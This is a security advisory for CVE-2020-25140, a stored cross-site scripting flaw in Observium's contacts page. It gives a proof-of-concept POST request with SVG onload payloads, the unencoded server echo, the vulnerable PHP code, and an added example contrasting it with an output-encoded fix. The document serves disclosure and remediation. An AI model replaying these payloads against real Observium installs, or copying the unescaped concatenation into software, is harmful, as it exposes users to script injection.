@ahpaleus
Last active September 22, 2020 09:13
CVE-2020-25140 - Cross-Site Scripting (Observium)
CVE - CVE-2020-25140
------------------------------------------
Cross Site Scripting in contacts
------------------------------------------
[Description]
A penetration test showed that the Observium contacts page is vulnerable to stored Cross-Site Scripting (XSS): the contact description (contact_descr) submitted when adding a contact is saved and later written into the HTML of the contacts page without output encoding, so injected JavaScript executes in the browser of a user who views that page.
------------------------------------------
[Additional Information]
Example request that stores the XSS payload (the contact_descr and contact_email_email fields carry URL-encoded payloads; the one in contact_descr is the one shown executing below):
POST /contacts/ HTTP/1.1
Host: localhost
Connection: close
Content-Length: 1881
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Cookie: OBSID=4slh6iphh480ce9f69ub3m14rk5j452q; observium_screen_ratio=0.8999999761581421; observium_screen_resolution=3840x2160
contact_method=email&contact_descr=%3Csvg%2Fonload%3Dalert%281337%29%3E&contact_email_email=%22%3E%3Csvg%2Fonload%3Dconfirm%28document.domain%29%3E%22%40x.y&contact_hipchat_room_id=&contact_hipchat_token=&contact_hipchat_from=&contact_hipchat_url=&contact_hipchat_notify=true&contact_teams_webhook_address=&contact_messagebird_recipient=&contact_messagebird_originator=&contact_messagebird_accesskey=&contact_slack_channel=general&contact_slack_username=observium&contact_slack_url=&contact_slack_short=&contact_pagerduty_service_key=&contact_victorops_routing_key=everyone&contact_victorops_url=&contact_pushover_user=&contact_pushover_token=&contact_redoxygen_acctid=&contact_redoxygen_email=&contact_redoxygen_password=&contact_redoxygen_recipient=&contact_redoxygen_from=&contact_redoxygen_url=&contact_smsbox_phone=&contact_clickatell_recipient=&contact_clickatell_apiid=&contact_smstools_recipient=&contact_smstools_path=&contact_telegram_recipient=&contact_telegram_bot_hash=&contact_telegram_disable_notification=&contact_script_script=&contact_xmpp_recipient=&contact_xmpp_username=&contact_xmpp_password=&contact_xmpp_server=&contact_xmpp_port=&contact_webhook-old_url=&contact_webhook-old_token=&contact_webhook-old_originator=&contact_webhook_url=&contact_opsgenie_api_key=&contact_opsgenie_recipients=&contact_opsgenie_region=&contact_alertops_url=&contact_alertops_assignee=&contact_textlocal_recipient=&contact_textlocal_originator=&contact_textlocal_accesskey=&contact_smsenvoi_recipient=&contact_smsenvoi_originator=&contact_smsenvoi_apiid=&contact_smsenvoi_type=SMS&contact_smsenvoi_subtype=&contact_smsenvoi_senderlabel=&contact_smsinfobip_recipient=&contact_smsinfobip_originator=&contact_smsinfobip_base_url=&contact_smsinfobip_login=&contact_smsinfobip_password=&action=add_contact&requesttoken=e1ef5dbe9de4269131b7940c49f2de685cf89fc290e523a8f28e588dc6a637f5
Partial server response (the stored description is echoed unencoded inside the delete-contact modal title; note that the X-XSS-Protection header seen below does not protect against stored XSS):
HTTP/1.1 200 OK
Date: Tue, 11 Aug 2020 14:07:50 GMT
Server: Apache/2.4.6 (Red Hat Enterprise Linux) OpenSSL/1.0.2k-fips PHP/7.0.30
Strict-Transport-Security: max-age=63072000; includeSubdomains;
X-Frame-Options: DENY
X-Powered-By: PHP/7.0.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: OBSID=4slh6iphh480ce9f69ub3m14rk5j452q; expires=Tue, 11-Aug-2020 14:37:51 GMT; Max-Age=1800; path=/; secure;HttpOnly;Secure
X-XSS-Protection: 1; mode=block
X-Permitted-Cross-Domain-Policies: none
X-Content-Type-Options: nosniff
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 1074141
<!DOCTYPE html>
<html lang="en">
<head>
<base href="https://localhost/"/>
<meta http-equiv="content-type" content="text/html; charset=utf-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"/>
(…)
<div class="modal-header">
<button type="button" class="close" data-dismiss="modal" aria-label="Close"><span aria-hidden="true">&times;</span></button>
<h3 class="modal-title" id="modal-contact_delete_19_label">Delete Contact "<svg/onload=alert(1337)>" (Id: 19, E-mail)</h3>
</div>
Vulnerable code, /var/opt/observium/html/pages/contacts.inc.php (lines 167-178):
$form = array('type' => 'horizontal',
'userlevel' => 10, // Minimum user level for display form
'id' => 'modal-contact_delete_'.$contact['contact_id'],
'title' => 'Delete Contact "' . $contact['contact_descr'] .
'" (Id: '. $contact['contact_id'] . ', ' . $config['transports'][$contact['contact_method']]['na$
//'modal_args' => $modal_args, // modal specific options
//'help' => 'This will delete the selected contact and any alert assocations.',
//'class' => '', // Clean default box class (default for modals)
//'url' => 'delhost/'
);
//$form['fieldset']['body'] = array('class' => 'modal-body'); // Required this class for modal body!
//$form['fieldset']['footer'] = array('class' => 'modal-footer'); // Required this class for modal footer!
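The following is an added example, not Observium's code or the vendor's fix. It rebuilds the modal title the same way the snippet above does, by plain string concatenation, and places the hardened form next to it, where every untrusted value is passed through htmlspecialchars() before it reaches HTML. The contact record and $config entry are constructed from the request above; the function names modal_title_vulnerable, modal_title_safe and h are assumptions chosen for illustration.

```php
<?php
// Added example (not Observium's code). Shows the unescaped concatenation that
// produces the stored XSS next to an output-encoded version of the same title.

// Constructed contact row mirroring what the PoC request above stores.
$contact = array(
    'contact_id'          => 19,
    'contact_method'      => 'email',
    'contact_descr'       => '<svg/onload=alert(1337)>',
    'contact_email_email' => '"><svg/onload=confirm(document.domain)>"@x.y',
);
// Constructed transport table entry (assumed shape; only 'name' is used here).
$config = array('transports' => array('email' => array('name' => 'E-mail')));

// Vulnerable: the attacker-controlled description is concatenated into HTML as-is.
function modal_title_vulnerable(array $contact, array $config)
{
    return 'Delete Contact "' . $contact['contact_descr'] .
           '" (Id: ' . $contact['contact_id'] . ', ' .
           $config['transports'][$contact['contact_method']]['name'] . ')';
}

// HTML output encoder (assumed helper name). ENT_QUOTES also encodes ' and ",
// so the same helper is safe for values that end up inside attributes;
// ENT_SUBSTITUTE replaces invalid UTF-8 instead of returning an empty string.
function h($value)
{
    return htmlspecialchars((string) $value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// Hardened: every value that did not originate in the code is encoded at the
// point where it is written into HTML.
function modal_title_safe(array $contact, array $config)
{
    return 'Delete Contact "' . h($contact['contact_descr']) .
           '" (Id: ' . h($contact['contact_id']) . ', ' .
           h($config['transports'][$contact['contact_method']]['name']) . ')';
}

// Regression check a tester can keep: the raw payload must not survive encoding.
function payload_neutralised(array $contact, array $config)
{
    $title = modal_title_safe($contact, $config);
    return strpos($title, '<svg') === false && strpos($title, '&lt;svg') !== false;
}

echo modal_title_vulnerable($contact, $config), PHP_EOL;
echo modal_title_safe($contact, $config), PHP_EOL;
var_dump(payload_neutralised($contact, $config));
```

Run with php on the command line. The vulnerable function reproduces the title seen in the response above, with the raw <svg/onload=...> tag intact; the hardened one emits the description with < and > turned into &lt; and &gt;, so the browser renders the payload as text instead of executing it. Encoding at output time, rather than trying to strip tags on input, is the fix that also covers the other fields in the same request (the contact_email_email value carries a similar payload) wherever they are later rendered.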
------------------------------------------
[VulnerabilityType Other]
Cross Site Scripting
------------------------------------------
[Vendor of Product]
https://www.observium.org/
------------------------------------------
[Affected Product Code Base]
Professional, Enterprise & Community 20.8.10631
------------------------------------------
[Affected Component]
contacts
------------------------------------------
[Attack Type]
Remote
------------------------------------------
[Reference]
https://github.com/OWASP/ASVS/blob/master/4.0/en/0x13-V5-Validation-Sanitization-Encoding.md
https://www.owasp.org/images/b/bc/OWASP_Top_10_Proactive_Controls_V3.pdf
https://www.owasp.org/index.php/Testing_for_Reflected_Cross_site_scripting_(OTG-INPVAL-001)
https://www.owasp.org/index.php/Testing_for_Stored_Cross_site_scripting_(OTG-INPVAL-002)
https://www.owasp.org/index.php/Testing_for_DOM-based_Cross_site_scripting_(OTG-CLIENT-001)
------------------------------------------
[Discoverer]
Maciej Domański
------------------------------------------
Maciej Domański / AFINE.com team